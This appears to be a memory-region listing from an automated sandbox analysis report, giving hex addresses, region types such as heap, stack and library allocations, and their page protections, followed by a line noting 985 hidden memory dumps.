trusted library allocation
page execute and read and write
1EFC2F70000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page read and write
45ECEB9000
stack
page read and write
1DFCCBBC000
heap
page read and write
7FFD9B764000
trusted library allocation
page read and write
2C86000
trusted library allocation
page read and write
17B33877000
trusted library allocation
page read and write
17B42B01000
trusted library allocation
page read and write
1B9B0000
heap
page read and write
1DFB5504000
trusted library allocation
page read and write
620000
heap
page read and write
1EFC1BB0000
trusted library allocation
page read and write
1BB90000
heap
page execute and read and write
1F70186C000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
17B30D82000
heap
page read and write
10F4000
stack
page read and write
1F76D085000
heap
page read and write
1EFC1D60000
trusted library allocation
page read and write
1DFB28BE000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1DFCCAA0000
trusted library allocation
page read and write
17B33DFC000
trusted library allocation
page read and write
45EDD0D000
stack
page read and write
17B4AF50000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
7FFD9BA7F000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
1EFC1BC0000
heap
page readonly
1F76B730000
trusted library allocation
page read and write
2B641F9000
stack
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
7FFD9BBE0000
trusted library allocation
page read and write
2C71000
trusted library allocation
page read and write
1DFC4540000
trusted library allocation
page read and write
1DFB5C58000
trusted library allocation
page read and write
C667BE000
stack
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
1DFCCC36000
heap
page read and write
1EFC1CA5000
heap
page read and write
7FFD9B774000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1DFB5594000
trusted library allocation
page read and write
1B50F000
stack
page read and write
7FFD9B774000
trusted library allocation
page read and write
1EFC1CA0000
heap
page read and write
1F7010C3000
trusted library allocation
page read and write
1F76D908000
heap
page read and write
17B32A80000
heap
page execute and read and write
17B30D65000
heap
page read and write
DE3000
heap
page read and write
1B88E000
stack
page read and write
17B30D9E000
heap
page read and write
1EFC2EB8000
trusted library allocation
page read and write
17B33A5F000
trusted library allocation
page read and write
17B4AEA9000
heap
page read and write
17B30CF0000
heap
page read and write
1DFB589A000
trusted library allocation
page read and write
7FFD9B826000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
17B32845000
heap
page read and write
2B64476000
stack
page read and write
1EFC0280000
heap
page read and write
1CF6C000
stack
page read and write
45EDD8B000
stack
page read and write
7FFD9BB53000
trusted library allocation
page read and write
17B42AF1000
trusted library allocation
page read and write
45EDC8C000
stack
page read and write
1EFDA4C0000
heap
page read and write
1C4DD000
stack
page read and write
C6758C000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
1C5DE000
stack
page read and write
1F701DE0000
trusted library allocation
page read and write
850000
heap
page read and write
1AF5E000
stack
page read and write
1F710072000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1DFB2880000
heap
page read and write
17B42DEA000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
C6750E000
stack
page read and write
2C8D000
trusted library allocation
page read and write
1B5BD000
stack
page read and write
1F700001000
trusted library allocation
page read and write
1DFCC810000
heap
page read and write
17B33D9A000
trusted library allocation
page read and write
17B42B62000
trusted library allocation
page read and write
17B4B19C000
heap
page read and write
1EFDA5CE000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7DF46A5E0000
trusted library allocation
page execute and read and write
7FFD9B782000
trusted library allocation
page read and write
17B34440000
trusted library allocation
page read and write
1DFCC907000
heap
page read and write
1EFC2D0C000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7DF425DB0000
trusted library allocation
page execute and read and write
1DFCCC58000
heap
page read and write
C66153000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
17B30E2F000
heap
page read and write
17B42DDB000
trusted library allocation
page read and write
C6778E000
stack
page read and write
1F76B4D7000
heap
page read and write
1EFC0287000
heap
page read and write
25AC000
trusted library allocation
page read and write
1DFB51DC000
trusted library allocation
page read and write
708000
heap
page read and write
1DFB5104000
trusted library allocation
page read and write
7FFD9BADC000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1DFC4714000
trusted library allocation
page read and write
2B6437E000
stack
page read and write
7DF4C58C0000
trusted library allocation
page execute and read and write
1EFDA55F000
heap
page read and write
1EFC3B96000
trusted library allocation
page read and write
1AA1D000
stack
page read and write
2C60000
trusted library allocation
page read and write
1F76D010000
heap
page read and write
9E0000
heap
page read and write
7FFD9BBD6000
trusted library allocation
page read and write
1EFDA508000
heap
page read and write
855000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
1F76D5A6000
heap
page execute and read and write
1DFB2AB0000
heap
page execute and read and write
7FFD9BAB9000
trusted library allocation
page read and write
17B4B163000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1F76D919000
heap
page read and write
D9A000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
1DFB2850000
trusted library section
page read and write
6C8000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
45ECAF9000
stack
page read and write
17B348F2000
trusted library allocation
page read and write
1470000
heap
page read and write
1F76B660000
heap
page read and write
6A9000
heap
page read and write
7FFD9B816000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
17B33CCC000
trusted library allocation
page read and write
C668B9000
stack
page read and write
1F701031000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
1EFC298D000
trusted library allocation
page read and write
17B32770000
trusted library allocation
page read and write
1F7012AA000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
142F000
stack
page read and write
2C80000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
1239000
heap
page read and write
1EFC2CF7000
trusted library allocation
page read and write
1BFCB000
stack
page read and write
D4E2C7E000
stack
page read and write
1EFC1BD0000
trusted library allocation
page read and write
2C3E000
trusted library allocation
page read and write
2CB4000
trusted library allocation
page read and write
17B4B1B0000
heap
page read and write
7FFD9BBC6000
trusted library allocation
page read and write
99E000
stack
page read and write
7FFD9B780000
trusted library allocation
page read and write
7FFD9B944000
trusted library allocation
page read and write
7FFD9B954000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
2E81000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2B652C9000
stack
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1F76B740000
heap
page read and write
1F70182D000
trusted library allocation
page read and write
1B5C0000
heap
page read and write
7FFD9B921000
trusted library allocation
page read and write
17B4B064000
heap
page read and write
45ECB7F000
stack
page read and write
1F701C1F000
trusted library allocation
page read and write
7FFD9BB62000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
D4E3E07000
stack
page read and write
7FFD9BAEC000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
17B4B0F3000
heap
page read and write
1F76DA4E000
heap
page read and write
7FFD9BBDD000
trusted library allocation
page read and write
1DFB4556000
trusted library allocation
page read and write
127A000
heap
page read and write
1575000
heap
page read and write
17B4AE70000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page read and write
1EFC1CB0000
trusted library allocation
page read and write
7FFD9BAD8000
trusted library allocation
page read and write
2BE1000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1B6CE000
stack
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
7FFD9B7CC000
trusted library allocation
page execute and read and write
7FFD9BAB4000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
7FFD9BAE0000
trusted library allocation
page read and write
1B780000
heap
page execute and read and write
7FFD9B760000
trusted library allocation
page read and write
1F7013C9000
trusted library allocation
page read and write
1F700D7A000
trusted library allocation
page read and write
17B4B0B1000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
DDC000
heap
page read and write
1F76D030000
heap
page execute and read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
D4E323E000
stack
page read and write
2B642F7000
stack
page read and write
7FFD9B772000
trusted library allocation
page read and write
14F0000
heap
page execute and read and write
17B32B6C000
trusted library allocation
page read and write
1EFDA253000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
17B4AE34000
heap
page read and write
17B30D20000
heap
page read and write
17B4AE7F000
heap
page read and write
17B33B26000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
1EFD9D9E000
heap
page read and write
17B32830000
heap
page read and write
23C0000
heap
page read and write
2B9E000
stack
page read and write
C66B3B000
stack
page read and write
17B30FA0000
heap
page readonly
7FFD9BAE0000
trusted library allocation
page read and write
17B32955000
heap
page read and write
1EFC0160000
heap
page read and write
C6760E000
stack
page read and write
2C45000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
6DC000
heap
page read and write
45EDB8E000
stack
page read and write
7FFD9B820000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
1F700F73000
trusted library allocation
page read and write
1EFC1E17000
trusted library allocation
page read and write
17B33B87000
trusted library allocation
page read and write
D76000
heap
page read and write
1F70007B000
trusted library allocation
page read and write
D4E32BB000
stack
page read and write
1DFC47C8000
trusted library allocation
page read and write
1DFB2A90000
heap
page execute and read and write
1EFC1C30000
heap
page read and write
10D0000
heap
page read and write
1DFB2B40000
heap
page read and write
1DFB28C8000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
12F0000
heap
page read and write
1AE5F000
stack
page read and write
7FFD9B931000
trusted library allocation
page read and write
45ECF3E000
stack
page read and write
1F76D63F000
heap
page read and write
1DFB2AF0000
trusted library allocation
page read and write
233E000
stack
page read and write
1C9E8000
stack
page read and write
1F76D955000
heap
page read and write
1EFDA247000
heap
page execute and read and write
7DF425DC0000
trusted library allocation
page execute and read and write
1DFB2AC0000
trusted library allocation
page read and write
1DFC47C0000
trusted library allocation
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
1EFC02BD000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1465000
heap
page read and write
7FFD9BAE2000
trusted library allocation
page read and write
7FFD9BAD8000
trusted library allocation
page read and write
17B4B3F0000
heap
page read and write
1F76B680000
heap
page read and write
12E0000
heap
page read and write
1DFCCAE4000
heap
page read and write
C67689000
stack
page read and write
1DFCCB38000
heap
page read and write
1F76D5B0000
heap
page read and write
1F76D070000
trusted library allocation
page read and write
1EFD1E02000
trusted library allocation
page read and write
17B42DE2000
trusted library allocation
page read and write
7FFD9B78B000
trusted library allocation
page read and write
7FFD9B771000
trusted library allocation
page read and write
7FFD9B79B000
trusted library allocation
page read and write
1F76D97B000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
17B33A67000
trusted library allocation
page read and write
7FFD9B912000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
D4E3138000
stack
page read and write
C66ABE000
stack
page read and write
45EC873000
stack
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
1B8F3000
heap
page read and write
1DFB28CC000
heap
page read and write
1DFB2870000
trusted library allocation
page read and write
45ED13B000
stack
page read and write
1DFB2A80000
trusted library allocation
page read and write
1B40D000
stack
page read and write
1EFC2D03000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1DFB2830000
heap
page read and write
17B327A0000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
1DFB56E6000
trusted library allocation
page read and write
1DFB2A60000
trusted library allocation
page read and write
1DFB62D7000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9BAB3000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1EFDA3E0000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1F7102EF000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1DFB2B75000
heap
page read and write
17B34912000
trusted library allocation
page read and write
7FF4B9460000
trusted library allocation
page execute and read and write
2D00000
trusted library allocation
page read and write
1B05E000
stack
page read and write
1F76D900000
heap
page read and write
1EFC2FA9000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
7FFD9B7CC000
trusted library allocation
page execute and read and write
1F710346000
trusted library allocation
page read and write
D70000
heap
page read and write
1BA8E000
stack
page read and write
2C97000
trusted library allocation
page read and write
17B30D40000
heap
page read and write
1EFDA4F9000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1DFB499F000
trusted library allocation
page read and write
7FFD9BAC9000
trusted library allocation
page read and write
7FFD9BAA3000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
17B34358000
trusted library allocation
page read and write
17B34273000
trusted library allocation
page read and write
1DFCCAE0000
heap
page read and write
1DFB62F7000
trusted library allocation
page read and write
1EFC02C4000
heap
page read and write
D80000
unkown
page readonly
1F76DA2D000
heap
page read and write
1DFB290B000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
1EFDA5AA000
heap
page read and write
706000
heap
page read and write
10F5000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
17B4B154000
heap
page read and write
2CFC000
trusted library allocation
page read and write
1DFB50D0000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
45ECBFB000
stack
page read and write
1EFDA520000
heap
page read and write
1DFCC899000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1EFDA56D000
heap
page read and write
2B644F9000
stack
page read and write
2B63D83000
stack
page read and write
DB2000
heap
page read and write
D4E2F3E000
stack
page read and write
7FFD9B826000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
17B33542000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9B964000
trusted library allocation
page read and write
1C5E0000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
1232000
heap
page read and write
8E0000
unkown
page readonly
1EFC309E000
trusted library allocation
page read and write
2B6477B000
stack
page read and write
7FFD9BB80000
trusted library allocation
page read and write
17B30D53000
heap
page read and write
C66778000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
2CDA000
trusted library allocation
page read and write
17B30FC0000
heap
page read and write
7FFD9B922000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9BB8C000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
17B33EB7000
trusted library allocation
page read and write
1F76B490000
heap
page read and write
7FFD9BAC9000
trusted library allocation
page read and write
742000
heap
page read and write
1DFB27D0000
heap
page read and write
C6693A000
stack
page read and write
7DF4AA7B0000
trusted library allocation
page execute and read and write
E2F000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
D4E2EF9000
stack
page read and write
17B33D05000
trusted library allocation
page read and write
2B6407E000
stack
page read and write
1F76D945000
heap
page read and write
1F76B516000
heap
page read and write
DDE000
heap
page read and write
7FFD9BACC000
trusted library allocation
page read and write
45ECC7D000
stack
page read and write
1F76D93D000
heap
page read and write
17B30F30000
heap
page read and write
17B4B185000
heap
page read and write
17B4AF28000
heap
page read and write
D4E2E7E000
stack
page read and write
2CB2000
trusted library allocation
page read and write
2C8A000
trusted library allocation
page read and write
660000
heap
page read and write
2CC1000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
17B30D7E000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
1C8EA000
stack
page read and write
17B336FD000
trusted library allocation
page read and write
1F76D983000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1EFC2DC6000
trusted library allocation
page read and write
1F76B4CC000
heap
page read and write
1F710021000
trusted library allocation
page read and write
1F76D5A0000
heap
page execute and read and write
1DFCCC80000
heap
page read and write
45ECDB7000
stack
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
D4E28F3000
stack
page read and write
2B640FE000
stack
page read and write
1DFB5723000
trusted library allocation
page read and write
There are 985 hidden memdumps, click here to show them.